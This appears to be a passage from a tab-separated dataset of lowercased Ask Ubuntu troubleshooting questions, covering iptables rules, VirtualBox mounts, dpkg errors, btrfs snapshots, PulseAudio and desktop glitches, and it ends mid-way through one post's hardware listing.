469467	iptables rules no longer honored	i installed ubuntu server 64-bit 14.04 a week ago . it worked fine for one to several days , then out of the blue , iptables became meaningless ( i noticed ftp and such are down ) . only ports 22 , 25 & 80 are open . iptables -s looks fine but for some reason is no longer honored . flush & all ports are not open , just 22 , 25 & 80. network-manager is not installed ( i verified that too ) . i do n't have any other firewall ... i do n't get it ? /etc/network/interfaces : auto lo iface lo inet loopback auto em1 iface em1 inet static address xx.15.191.xxx netmask 255.255.255.240 gateway xx.15.191.xxx dns-nameservers xx.105.28.xx pre-up iptables-restore < /etc/iptables.rules post-down iptables-restore > /etc/iptables.downrules /etc/hosts 127.0.0.1 localhost 127.0.1.1 my-server.ph.cox.net my-server xx.15.191.xxx mysite.com # the following lines are desirable for ipv6 capable hosts : :1 localhost ip6-localhost ip6-loopback ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters /etc/hostname : my-server /etc/resolv.conf ( not set be my , autoset if i understand correct ) : nameserver xx.105.28.xx /etc/iptables.rules *filter : input accept [ 0:0 ] : forward accept [ 0:0 ] : output accept [ 19969:30829963 ] # < -- - not sure where this came from ? -a input -i lo -j accept -a input -m conntrack -- ctstate established , related -j accept -a input -p tcp -m tcp -- dport 22 -m state -- state new -m recent -- set -- name ssh -- mask 255.255.255.255 -- rsource -a input -m recent -- update -- seconds 90 -- hitcount 4 -- rttl -- name ssh -- mask 255.255.255.255 -- rsource -j drop -a input -p tcp -m tcp -- dport 20 -j accept -a input -p tcp -m tcp -- dport 21 -j accept -a input -p tcp -m tcp -- dport 22 -j accept -a input -p tcp -m tcp -- dport 25 -j accept -a input -p tcp -m tcp -- dport 80 -j accept -a input -p tcp -m tcp -- dport 53 -j accept # -a input -p tcp -m tcp -- dport 110 -j accept -a input -p tcp -m tcp -- dport 143 -j accept -a input -p tcp -m tcp -- dport 443 -j accept -a input -p tcp -m tcp -- dport 993 -j accept -a input -p tcp -m tcp -- dport 3306 -j accept -a input -p tcp -m tcp -- dport 4444 -j accept -a input -p tcp -d 0/0 -s 0/0 -- dport 5900 -j accept # -a input -p tcp -m tcp -- dport 5900 -j accept -a input -p udp -m udp -- dport 5900 -j accept -a input -p tcp -m tcp -- dport 9312 -j accept -a input -p icmp -m limit -- limit 10/sec -j accept -a forward -p icmp -m limit -- limit 10/sec -j accept -a input -j drop -a output -p tcp -m tcp -- dport 20 -j accept -a output -p tcp -m tcp -- dport 21 -j accept -a output -p tcp -m tcp -- dport 22 -j accept -a output -p tcp -m tcp -- dport 25 -j accept -a output -p tcp -m tcp -- dport 80 -j accept -a output -p tcp -m tcp -- dport 53 -j accept # -a output -p tcp -m tcp -- dport 110 -j accept -a output -p tcp -m tcp -- dport 143 -j accept -a output -p tcp -m tcp -- dport 443 -j accept -a output -p tcp -m tcp -- dport 465 -j accept -a output -p tcp -m tcp -- dport 993 -j accept -a output -p tcp -m tcp -- dport 3306 -j accept -a output -p tcp -m tcp -- dport 4444 -j accept -a output -p tcp -m tcp -- dport 5900 -j accept -a output -p tcp -m tcp -- dport 9312 -j accept -a output -p tcp -m tcp -- sport 20 -j accept commit this is the only noticeable dmesg after boot , but it does n't seem related as i 'm on ip4 , and besides , it works for 1 to 3 days . ipv6 : addrconf ( netdev_up ) : em1 : link is not ready dmesg | grep eth0 : [ 3.787227 ] e1000e 0000:00:19.0 eth0 : registered phc clock [ 3.787228 ] e1000e 0000:00:19.0 eth0 : ( pci express:2.5gt/s : width x1 ) c8:60:00:24 : ea : cc [ 3.787229 ] e1000e 0000:00:19.0 eth0 : intel ( r ) pro/1000 network connection [ 3.787281 ] e1000e 0000:00:19.0 eth0 : mac : 10 , phy : 11 , pba no : ffffff-0ff [ 5.219089 ] systemd-udevd [ 157 ] : renamed network interface eth0 to em1 sudo lsof -i -s tcp : listen ( output as requested ) sshd 960 root 3u ipv4 564 0t0 tcp * : ssh ( listen ) sshd 960 root 4u ipv6 566 0t0 tcp * : ssh ( listen ) mysqld 1011 mysql 12u ipv4 602 0t0 tcp localhost : mysql ( listen ) exim4 2001 debian-exim 3u ipv4 11966 0t0 tcp localhost : smtp ( listen ) exim4 2001 debian-exim 4u ipv6 11967 0t0 tcp localhost : smtp ( listen ) exim4 2001 debian-exim 5u ipv4 11968 0t0 tcp mysite.com : smtp ( listen ) searchd 2025 root 7u ipv4 14510 0t0 tcp *:9312 ( listen ) proftpd 2041 proftpd 2u ipv6 11974 0t0 tcp * : ftp ( listen ) apache2 2103 root 4u ipv6 11992 0t0 tcp * : http ( listen ) apache2 3882 www-data 4u ipv6 11992 0t0 tcp * : http ( listen ) apache2 4230 www-data 4u ipv6 11992 0t0 tcp * : http ( listen ) apache2 etc , etc ... sudo lsof -i -s tcp : listen ( 1 week after ftp worked fine , port is suddenly blocked ) sshd 960 root 3u ipv4 564 0t0 tcp * : ssh ( listen ) sshd 960 root 4u ipv6 566 0t0 tcp * : ssh ( listen ) mysqld 1011 mysql 12u ipv4 602 0t0 tcp localhost : mysql ( listen ) exim4 2001 debian-exim 3u ipv4 11966 0t0 tcp localhost : smtp ( listen ) exim4 2001 debian-exim 4u ipv6 11967 0t0 tcp localhost : smtp ( listen ) exim4 2001 debian-exim 5u ipv4 11968 0t0 tcp mysite.com : smtp ( listen ) searchd 2025 root 7u ipv4 14510 0t0 tcp *:9312 ( listen ) apache2 2103 root 4u ipv6 11992 0t0 tcp * : http ( listen ) apache2 4151 www-data 4u ipv6 11992 0t0 tcp * : http ( listen ) apache2 4710 www-data 4u ipv6 11992 0t0 tcp * : http ( listen ) apache2 etc , etc ... sudo nmap -o mysite.com ( 1 week after ftp worked fine , port is suddenly blocked ) 20/tcp closed ftp-data 21/tcp closed ftp 22/tcp open ssh 25/tcp open smtp 53/tcp closed domain 80/tcp open http 143/tcp closed imap 443/tcp closed https 993/tcp closed imaps 3306/tcp closed mysql 4444/tcp closed krb524 5900/tcp closed vnc sudo iptables-save ( output as requested ) # generated by iptables-save v1.4.21 on tue may 27 20:39:05 2014 *filter : input accept [ 0:0 ] : forward accept [ 0:0 ] : output accept [ 17351423:29122270850 ] -a input -i lo -j accept -a input -m conntrack -- ctstate related , established -j accept -a input -p tcp -m tcp -- dport 22 -m state -- state new -m recent -- set -- name ssh -- mask 255.255.255.255 -- rsource -a input -m recent -- update -- seconds 90 -- hitcount 4 -- rttl -- name ssh -- mask 255.255.255.255 -- rsource -j drop -a input -p tcp -m tcp -- dport 20 -j accept -a input -p tcp -m tcp -- dport 21 -j accept -a input -p tcp -m tcp -- dport 22 -j accept -a input -p tcp -m tcp -- dport 25 -j accept -a input -p tcp -m tcp -- dport 80 -j accept -a input -p tcp -m tcp -- dport 53 -j accept -a input -p tcp -m tcp -- dport 143 -j accept -a input -p tcp -m tcp -- dport 443 -j accept -a input -p tcp -m tcp -- dport 993 -j accept -a input -p tcp -m tcp -- dport 3306 -j accept -a input -p tcp -m tcp -- dport 4444 -j accept -a input -p tcp -m tcp -- dport 5900 -j accept -a input -p udp -m udp -- dport 5900 -j accept -a input -p tcp -m tcp -- dport 9312 -j accept -a input -p icmp -m limit -- limit 10/sec -j accept -a input -j drop -a forward -p icmp -m limit -- limit 10/sec -j accept -a output -p tcp -m tcp -- dport 20 -j accept -a output -p tcp -m tcp -- dport 21 -j accept -a output -p tcp -m tcp -- dport 22 -j accept -a output -p tcp -m tcp -- dport 25 -j accept -a output -p tcp -m tcp -- dport 80 -j accept -a output -p tcp -m tcp -- dport 53 -j accept -a output -p tcp -m tcp -- dport 143 -j accept -a output -p tcp -m tcp -- dport 443 -j accept -a output -p tcp -m tcp -- dport 465 -j accept -a output -p tcp -m tcp -- dport 993 -j accept -a output -p tcp -m tcp -- dport 3306 -j accept -a output -p tcp -m tcp -- dport 4444 -j accept -a output -p tcp -m tcp -- dport 5900 -j accept -a output -p tcp -m tcp -- dport 9312 -j accept -a output -p tcp -m tcp -- sport 20 -j accept commit # completed on tue may 27 20:39:05 2014 ifconfig ( output as requested ) em1 link encap : ethernet hwaddr c8:60:00:24 : ea : cc inet addr : xx.15.191.xxx bcast : xx.15.191.xxx mask:255.255.255.240 inet6 addr : fe80 : :ca60 : ff : fe24 : eacc/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:19212799 errors:0 dropped:0 overruns:0 frame:0 tx packets:24791186 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:6488896548 ( 6.4 gb ) tx bytes:29719279878 ( 29.7 gb ) interrupt:20 memory : f7d00000-f7d20000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:4415657 errors:0 dropped:0 overruns:0 frame:0 tx packets:4415657 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:573695629 ( 573.6 mb ) tx bytes:573695629 ( 573.6 mb )
469469	ca n't mount to host file under a guest ubuntu virtualbox permanently	i 'm running guest ubuntu on a windows8 host . unable to mount to the shared file on windows8 after reboot guest ubuntu . however , i 'm able to mount to the shared file on windows8 host after i did this sudo mount -t vboxsf `` shared file name '' `` file directory on guest machine '' after i restart , it was not mounting to the file on windows8 anymore . thanks for your help .
469473	juju and no default vpc on aws	i 'm trying to use juju with aws but when i bootstrap it says that it can not set up groups : `` no default vpc for this user ( vpcidnotspecified ) '' . i have no default vpc on aws and it appears it 's not trivial to get it . there 's been some discussion about this but it does n't look like it 's resolved . does anyone know if it is possible to set the vpc in environments.yaml ? thanks !
469474	libpam systemd - installation error ubuntu 14.04 unable to install updates	yesterday i was trying to build a custom iso of trusty i386 . during the first attempt , towards the end ( after i decided to mark all upgrades and install them ) the error message appeared-after repeated attempts to fix the broken packages and -f options to remove and install the package i had to give up the project . here is the message from the terminal # sudo dpkg -- configure -a setting up linux-image-3.13.0-27-generic ( 3.13.0-27.50 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) initrd.img ( /boot/initrd.img-3.13.0-27-generic ) points to /boot/initrd.img-3.13.0-27-generic ( /boot/initrd.img-3.13.0-27-generic ) -- doing nothing at /var/lib/dpkg/info/linux-image-3.13.0-27-generic.postinst line 491. vmlinuz ( /boot/vmlinuz-3.13.0-27-generic ) points to /boot/vmlinuz-3.13.0-27-generic ( /boot/vmlinuz-3.13.0-27-generic ) -- doing nothing at /var/lib/dpkg/info/linux-image-3.13.0-27-generic.postinst line 491 . examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.13.0-27-generic /boot/vmlinuz-3.13.0-27-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.13.0-27-generic /boot/vmlinuz-3.13.0-27-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.13.0-27-generic /boot/vmlinuz-3.13.0-27-generic update-initramfs : generating /boot/initrd.img-3.13.0-27-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.13.0-27-generic /boot/vmlinuz-3.13.0-27-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.13.0-27-generic /boot/vmlinuz-3.13.0-27-generic run-parts : executing /etc/kernel/postinst.d/zz-extlinux 3.13.0-27-generic /boot/vmlinuz-3.13.0-27-generic p : checking for extlinux directory ... found . p : writing config for /boot/vmlinuz-3.13.0-27-generic ... p : installing debian theme ... done . run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.13.0-27-generic /boot/vmlinuz-3.13.0-27-generic /etc/kernel/postinst.d/zz-update-grub : 22 : /etc/kernel/postinst.d/zz-update-grub : syntax error : `` fi '' unexpected run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.13.0-27-generic.postinst line 1025. dpkg : error processing package linux-image-3.13.0-27-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of libpam-systemd : i386 : libpam-systemd : i386 depends on systemd-services ( = 204-5ubuntu20 ) ; however : version of systemd-services on system is 204-5ubuntu20.2 . dpkg : error processing package libpam-systemd : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.13.0-27-generic ; however : package linux-image-3.13.0-27-generic is not configured yet . dpkg : error processing package linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.13.0.27.33 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing package linux-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-extra-3.13.0-27-generic : linux-image-extra-3.13.0-27-generic depends on linux-image-3.13.0-27-generic ; however : package linux-image-3.13.0-27-generic is not configured yet . dpkg : error processing package linux-image-extra-3.13.0-27-generic ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-3.13.0-27-generic libpam-systemd : i386 linux-image-generic linux-generic linux-image-extra-3.13.0-27-generic please help me ...
469476	cinnamon being a complete mess on ubuntu	after installing cinnamon the desktop icons on cinnmaon have black text where i want white and the windows are appearing as follows : and for the desktop , it is appearing like this , how do i remove the big black things in windows and change icon the icon text color ?
469477	how to recover a files and folders from /tmp location ?	i am new to linux/ubuntu . i mistakenly placed my backup into /tmp folder and now when i try to move those files to /home using cp -r , i lost everything in my /tmp . please help me recover my files .
469479	32-bit eclipse problem	i have 64-bit ubuntu and eclipse 64-bit for an older project . in 32-bit i tried to run it , but it does n't work ( swt ) ... so i decided to download a tarball of eclipse 32-bit ( with jvm 32-bit integrated ) . all fine , but so far i can not seem to run it . do you have any ideas ? 4 drwxrwsr-x 9 wouter wouter 4096 feb 16 2012 . 4 drwxr-xr-x 6 wouter wouter 4096 mai 20 07:50 .. 4 drwxrwsr-x 2 wouter wouter 4096 feb 16 2012 about_files 20 -rw-rw-r -- 1 wouter wouter 18909 feb 8 2012 about.html 92 -rw-rw-r -- 1 wouter wouter 94179 feb 16 2012 artifacts.xml 4 drwxrwsr-x 4 wouter wouter 4096 feb 16 2012 configuration 4 drwxrwsr-x 2 wouter wouter 4096 feb 16 2012 dropins 64 -rwxr-xr-x 1 wouter wouter 62814 feb 8 2012 eclipse 4 -rw-rw-r -- 1 wouter wouter 408 feb 16 2012 eclipse.ini 4 -rw-rw-r -- 1 wouter wouter 59 feb 8 2012 .eclipseproduct 20 -rw-rw-r -- 1 wouter wouter 16536 feb 8 2012 epl-v10.html 4 drwxrwsr-x 38 wouter wouter 4096 feb 16 2012 features 12 -rw-rw-r -- 1 wouter wouter 9022 feb 8 2012 icon.xpm 260 -rwxr-xr-x 1 wouter wouter 266168 feb 8 2012 libcairo-swt.so 12 -rw-rw-r -- 1 wouter wouter 8951 feb 8 2012 notice.html 4 drwxrwsr-x 5 wouter wouter 4096 feb 16 2012 p2 40 drwxrwsr-x 22 wouter wouter 36864 feb 16 2012 plugins 4 drwxrwsr-x 2 wouter wouter 4096 feb 16 2012 readme wouter @ laptop-wouter : ~/downloads/eclipse $ ./eclipse bash : ./eclipse : no such file or directory wouter @ laptop-wouter : ~/downloads/eclipse $ sudo ./eclipse sudo : unable to execute ./eclipse : no such file or directory
469486	dual booting linux and windows 8.1	i downloaded the ubuntu 14.04 64-bit iso and made a live pendrive using linuxlive usb creator . i disabled secure boot and fast startup . when i boot from the pendrive , i get a grub to choose between trying and installing linux . but , when i hit enter on either of these options , i get an error saying `` invalid magic number '' . this is the case even for the test memory option in the grub . i tried it with linux mint 16 too . but , i encountered the same problem . any idea why it is n't working ? thanks in advance .
469490	where does dm crypt keeps crypt list ?	if we enable encryption via cryptsetup tool on linux . where does it keeps the crypt list/ encryption disk sector information etc ? is it resides inside the luks header or device mapper kernel itself would takes care all of those information ? thanks for your reply . ~ abhrajyoti
469493	12.04 no new release found for upgrade	when i log into my server , i see the following message welcome to ubuntu 12.04.4 lts ( gnu/linux 2.6.38-15-generic x86_64 ) * documentation : https : //help.ubuntu.com/ 0 packages can be updated . 0 updates are security updates . new release '12.10 ' available . run 'do-release-upgrade ' to upgrade to it . but then when i run sudo do-release-upgrade i get this message : checking for a new ubuntu release no new release found does n't that seem kinda silly ? i was thinking that i should upgrade to version 13.04 or even 14.04 to be more up-to-date , but like this i am kinda stuck . i have seen this post : why is `` no new release found '' when upgrading from a lts to the next ? but that was answered back in 2012 , i would think that the new version is available for upgrade now ? thanks !
469496	reload ubuntu as at present it has stopped loading on startup	before leaving the states our company it person installed ubuntu on one of our lenovo 500 laptops . this laptop had a new hard drive installed . all worked fine until arriving in the uk . suddenly it would stop loading the os so it is impossible to access the website . our tech person just told me to buy a new laptop here . i am cheap and would like to fix this ( i am writing on my other asus , which does n't have a cd/dvd drive like the lenovo does ) . our it person does not normally use an open source operating system like ubuntu . since the ubuntu os is on the lenovo and something got corrupted , is it possible to roll back to an earlier point ? there is nothing critical on this laptop .
469497	touch on touchscreen operates on wrong monitor	i have a laptop with a touch screen , and i connect it to an external monitor at work . i touch the screen , but the touch is processed on the wrong monitor - for example , if i tap the lower right corner on my laptop screen , the app in the external monitor would receive the touch . if i disconnect it , touchscreen works as expected . connect it again , touch is on external monitor . any idea how to fix it ? thanks !
469498	purple line on left side of screen when i use graphics card 's hdmi port	my graphics card is a nvidia geforce gtx 660 2gb . when i plug hdmi into mobo it works fine . when i plug it into the graphics card ( with 2nd monitor too ) it shows a purple vertical line on the left side . it adds 2 pixels to the width and i ca n't adjust it with my monitor . it does n't come up when i print screen . i tried changing the driver to the binary one ( at the top ) but that made it not show up at all . what do i do ? are some graphics cards just not compatible ?
469499	get logitech audio device sink name	i am using the logitech mic for recording the audio . i am able to find the device name using the following command : pactl list short sources | grep `` alsa_input.usb '' | awk ' { print $ 2 } ' op : alsa_input.usb-046d_0823_d81a0330-00-u0x46d0x823_1.analog-stereo so now i want the sink name of that logitech mic . i tried using the following command : pactl list short sinks but it gives the system default sink instead of logitech mic sink . also i wanted the index number of loaded logitech pulseaudio module ? is there any command to get index number of loaded pulseaudio module . thanks in advanced .
469500	charset with driver for microsoft-sql	i have got a form on a php website on an apache on an ubuntu-server , to write data in a table of a microsoft sql-server . the charset of the website is utf-8 and the charset of the sql-server is latin_1 . so the strings in the sql table looks strange . i think this seams logic . it is not posible to change the charset of the sql-server to utf-8 . of course microsoft supports a driver to fix this problem , but of course the driver is only for microsoft operating systems . so i switched the charset of the php-web-form to iso-8859-1 , witch is n't identical to latin_1 , but then if i write for example : `` müller '' into the form , i get `` mller '' in the db . so i used goggle and found out that the `` normal '' linux driver do n't support this charset . has anyone an idea where i get a driver to write some text with correct charset from php to microsoft-sql ?
469502	tzdata and dpkg error code ( 2 )	nick @ host $ sudo apt-get install libxml2 reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : libxml2 1 upgraded , 0 newly installed , 0 to remove and 29 not upgraded . need to get 0 b/822 kb of archives . after this operation , 11.3 kb of additional disk space will be used . dpkg : unrecoverable fatal error , aborting : files list for package 'tzdata ' is not a regular file e : sub-process /usr/bin/dpkg returned an error code ( 2 ) nick @ host $ sudo dpkg -p -- force-all tzdata dpkg : tzdata : dependency problems , but removing anyway as you requested : util-linux depends on tzdata ( > = 2006c-2 ) . libapache2-mod-php5 depends on tzdata . php5-cli depends on tzdata . php5-fpm depends on tzdata . dpkg : unrecoverable fatal error , aborting : files list for package 'tzdata ' is not a regular file i 've tried all the commands like apt-get clean- > apt-get install tzdata , sudo apt-get install -fetc ... nothing works .
469506	delete snapshot make filesystem read-only	i am using btrfs 3.12 and each time i delete a snapshot , the entire btrfs volume become `` read only '' . so i umount it and try a btrfsck -- repair but every time it failed on this line : extent back ref already exists for 4788162379776 parent 0 root 258 extent back ref already exists for 4788162789376 parent 0 root 258 abandon ( core dumped ) here is the result dsmeg ( last lines because there are tons ) scsi 6:0:0:0 : direct-access eqlogic 100e-00 7.0 pq : 0 ansi : 5 sd 5:0:0:0 : attached scsi generic sg9 type 0 sd 6:0:0:0 : attached scsi generic sg10 type 0 sd 5:0:0:0 : [ sde ] 2684355840 4096-byte logical blocks : ( 10.9 tb/10.0 tib ) sd 6:0:0:0 : [ sdf ] 2684355840 4096-byte logical blocks : ( 10.9 tb/10.0 tib ) sd 10:0:0:0 : [ sdd ] write protect is off sd 10:0:0:0 : [ sdd ] mode sense : 81 00 00 00 sd 9:0:0:0 : [ sdc ] write protect is off sd 9:0:0:0 : [ sdc ] mode sense : 81 00 00 00 sd 10:0:0:0 : [ sdd ] write cache : disabled , read cache : enabled , does n't support dpo or fua sd 9:0:0:0 : [ sdc ] write cache : disabled , read cache : enabled , does n't support dpo or fua sd 6:0:0:0 : [ sdf ] write protect is off sd 6:0:0:0 : [ sdf ] mode sense : 81 00 00 00 sd 5:0:0:0 : [ sde ] write protect is off sd 5:0:0:0 : [ sde ] mode sense : 81 00 00 00 sd 6:0:0:0 : [ sdf ] write cache : disabled , read cache : enabled , does n't support dpo or fua sd 9:0:0:0 : [ sdc ] 2684355840 4096-byte logical blocks : ( 10.9 tb/10.0 tib ) sd 5:0:0:0 : [ sde ] write cache : disabled , read cache : enabled , does n't support dpo or fua sd 10:0:0:0 : [ sdd ] 2684355840 4096-byte logical blocks : ( 10.9 tb/10.0 tib ) sd 5:0:0:0 : [ sde ] 2684355840 4096-byte logical blocks : ( 10.9 tb/10.0 tib ) sd 6:0:0:0 : [ sdf ] 2684355840 4096-byte logical blocks : ( 10.9 tb/10.0 tib ) scsi 7:0:0:0 : direct-access eqlogic 100e-00 7.0 pq : 0 ansi : 5 sd 7:0:0:0 : attached scsi generic sg11 type 0 sd 7:0:0:0 : [ sdg ] 348967680 4096-byte logical blocks : ( 1.42 tb/1.29 tib ) scsi 8:0:0:0 : direct-access eqlogic 100e-00 7.0 pq : 0 ansi : 5 sd 8:0:0:0 : attached scsi generic sg12 type 0 sd 7:0:0:0 : [ sdg ] write protect is off sd 7:0:0:0 : [ sdg ] mode sense : 81 00 00 00 sd 7:0:0:0 : [ sdg ] write cache : disabled , read cache : enabled , does n't support dpo or fua sd 8:0:0:0 : [ sdh ] 348967680 4096-byte logical blocks : ( 1.42 tb/1.29 tib ) sd 7:0:0:0 : [ sdg ] 348967680 4096-byte logical blocks : ( 1.42 tb/1.29 tib ) sd 8:0:0:0 : [ sdh ] write protect is off sd 8:0:0:0 : [ sdh ] mode sense : 81 00 00 00 sd 8:0:0:0 : [ sdh ] write cache : disabled , read cache : enabled , does n't support dpo or fua sd 8:0:0:0 : [ sdh ] 348967680 4096-byte logical blocks : ( 1.42 tb/1.29 tib ) sdg : sdg1 sdh : sdh1 sd 8:0:0:0 : [ sdh ] 348967680 4096-byte logical blocks : ( 1.42 tb/1.29 tib ) sd 7:0:0:0 : [ sdg ] 348967680 4096-byte logical blocks : ( 1.42 tb/1.29 tib ) sd 8:0:0:0 : [ sdh ] attached scsi disk sd 7:0:0:0 : [ sdg ] attached scsi disk sde : unknown partition table sdf : unknown partition table sd 5:0:0:0 : [ sde ] 2684355840 4096-byte logical blocks : ( 10.9 tb/10.0 tib ) sd 6:0:0:0 : [ sdf ] 2684355840 4096-byte logical blocks : ( 10.9 tb/10.0 tib ) sd 5:0:0:0 : [ sde ] attached scsi disk sd 6:0:0:0 : [ sdf ] attached scsi disk sdd : unknown partition table sdc : unknown partition table sd 9:0:0:0 : [ sdc ] 2684355840 4096-byte logical blocks : ( 10.9 tb/10.0 tib ) sd 10:0:0:0 : [ sdd ] 2684355840 4096-byte logical blocks : ( 10.9 tb/10.0 tib ) sd 9:0:0:0 : [ sdc ] attached scsi disk sd 10:0:0:0 : [ sdd ] attached scsi disk device-mapper : multipath round-robin : version 1.0.0 loaded bio : create slab < bio-2 > at 2 bio : create slab < bio-3 > at 3 btrfs : device fsid dd26758b-a689-46a8-b4da-b5ecc07d73b6 devid 1 transid 135638 /dev/dm-0 btrfs : device fsid dd26758b-a689-46a8-b4da-b5ecc07d73b6 devid 2 transid 135638 /dev/dm-1 btrfs : device fsid dd26758b-a689-46a8-b4da-b5ecc07d73b6 devid 2 transid 135638 /dev/dm-1 btrfs : device fsid dd26758b-a689-46a8-b4da-b5ecc07d73b6 devid 1 transid 135638 /dev/dm-0 btrfs : device fsid dd26758b-a689-46a8-b4da-b5ecc07d73b6 devid 2 transid 135638 /dev/dm-1 perf samples too long ( 2511 > 2500 ) , lowering kernel.perf_event_max_sample_rate to 50000 show_signal_msg : 81 callbacks suppressed btrfsck [ 2604 ] : segfault at 0 ip 000000000041243a sp 00007fffe6793e40 error 6 in btrfsck [ 400000+53000 ] i also found a file : /var/crash/_sbin_btrfsck.0.crash here is the end of lines : 7f127eb34000-7f127eb36000 rw-p 00000000 00:00 0 7f127eb36000-7f127eb37000 r -- p 00022000 08:11 5374145 /lib/x86_64-linux-gnu/ld-2.15.so 7f127eb37000-7f127eb39000 rw-p 00023000 08:11 5374145 /lib/x86_64-linux-gnu/ld-2.15.so 7fffd36b4000-7fffd36d5000 rw-p 00000000 00:00 0 [ stack ] 7fffd378c000-7fffd378e000 r-xp 00000000 00:00 0 [ vdso ] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [ vsyscall ] procstatus : name : btrfsck state : s ( sleeping ) tgid : 9512 ngid : 0 pid : 9512 ppid : 5436 tracerpid : 0 uid : 0 0 0 0 gid : 0 0 0 0 fdsize : 256 groups : 0 vmpeak : 8855944 kb vmsize : 8855944 kb vmlck : 0 kb vmpin : 0 kb vmhwm : 7644076 kb vmrss : 7432256 kb vmdata : 8835640 kb vmstk : 136 kb vmexe : 332 kb vmlib : 3364 kb vmpte : 17324 kb vmswap : 1404244 kb threads : 1 sigq : 1/63594 sigpnd : 0000000000000000 shdpnd : 0000000000000000 sigblk : 0000000000000000 sigign : 0000000000000000 sigcgt : 0000000180000000 capinh : 0000000000000000 capprm : 0000001fffffffff capeff : 0000001fffffffff capbnd : 0000001fffffffff seccomp : 0 cpus_allowed : ffffffff cpus_allowed_list : 0-31 mems_allowed : 00000000,00000001 mems_allowed_list : 0 voluntary_ctxt_switches : 77639 nonvoluntary_ctxt_switches : 377681 signal : 6 uname : linux 3.13.0-031300-generic x86_64 regards ,
469511	changing the keyboard layout turns off the numlock	i have installed ubuntu 14.04 with english and greek keyboard layout and i have the following problem . when i toggle keyboard layouts ( en- > gr or gr- > en ) the num led turns off but i can print digits with the numeric keypad . so the numlock functions well but the led is off . this happens most of the times when i toggle keyboard layouts . is there a way to separate num led status from keyboard toggling ? at this point , i would like to clarify that this happens only at ubuntu unity version . when i tried xubuntu , kubuntu and other derivatives ( linuxmint ) the numlock led stays on when i toggle keyboard layouts .
469515	adjust text scaling factor for all users	i am using gnome tweak tools on my system which is ubuntu 12.04 with a few users set . i want to change the text scaling factor for all the user accounts . if i use gsettings set org.gnome.desktop.interface text-scaling-factor 0.7 does the job fine but only for the user that is issuing the command . the rest of the users retain their settings which i do n't want . i want to do this from cli since i am trying to incorporate this later to puppet .
469518	how can i watch the output that was filtered with grep ?	i want to watch the changes of the output gsettings list-recursively|grep text-scal which is org.gnome.desktop.interface text-scaling-factor 1.0 com.canonical.unity.interface text-scale-factor 1.0 but if i try to watch it with watch gsettings list-recursively|grep text-scal i get no output , because the pipe seems to be the problem . how can i still watch the changes ?
469524	pulseaudio automatically loads default loopback module after i load one	i am trying to stream audio from a bluetooth source to a bluetooth sink . i connect the devices , get confirmation that their modules are loaded in pulseaudio , then i load the loopback module . the loopback module is loaded , but pa loads another after that overrides mine : 26 module-loopback source= '' bluez_source.70_72_3c_62_49_7f '' source_dont_move= '' true '' sink_input_properties= '' media.role=music '' i tried commenting out the load-module module-default-device-restore line in etc/pulse/default.pa and restarting the daemon , but no dice . is there another setting i 'm missing ? or , even better , can i load my loopback module with some argument that gives it priority ?
469526	refresh interval for integrated google calendar	i have integrated my google account with my ubuntu 14.04 using online accounts in order to see my calendar entries in the indicator bar , and it works pretty well . my only problem is that sometimes i make changes during the day , and it looks like that my entries are not getting refreshed that often , so that i still miss some notifications . is it possible to set somehow the refresh interval for the integrated google calendar , or to refresh it manually ?
469527	why does my computer crash when i minimise the last window ?	i am runnung ubuntu 12.04 lts . if i have a few windows open ( say four to six , not a large amount ) , and minimise all by pressing ctrl+super+d , they all minimise immediately with no problems . however , if i minimise them one at a time , by clicking the minimise button with my mouse , the last one often hangs . usually it will appear as a ghost on the screen for a while , semi-minimised ( in other words , shrunk toward the unity launcher bar , half-size or smaller , and semi-transparent ) . usually it will eventually clear ; sometimes the computer just freezes and i have to restart it . it doesn’t seem to matter what the window actually is . just now , i had to restart my computer with skype* semi-minimised . i’ve seen it freeze before with the terminal semi-minimised ( and the terminal wasn’t even doing anything at the time ) . the only pattern is that it’s always the last window minimised which freezes , and that minimising all windows together using the keyboard shortcut works fine . what on earth is going on , and how can i stop it ? graphics information $ lspci 00:00.0 host bridge : intel corporation 4 series chipset dram controller ( rev 03 ) 00:01.0 pci bridge : intel corporation 4 series chipset pci express root port ( rev 03 ) 00:1a.0 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 4 00:1a.1 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 5 00:1a.2 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 6 00:1a.7 usb controller : intel corporation 82801ji ( ich10 family ) usb2 ehci controller # 2 00:1c.0 pci bridge : intel corporation 82801ji ( ich10 family ) pci express root port 1 00:1c.2 pci bridge : intel corporation 82801ji ( ich10 family ) pci express root port 3 00:1c.3 pci bridge : intel corporation 82801ji ( ich10 family ) pci express root port 4 00:1d.0 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 1 00:1d.1 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 2 00:1d.2 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 3 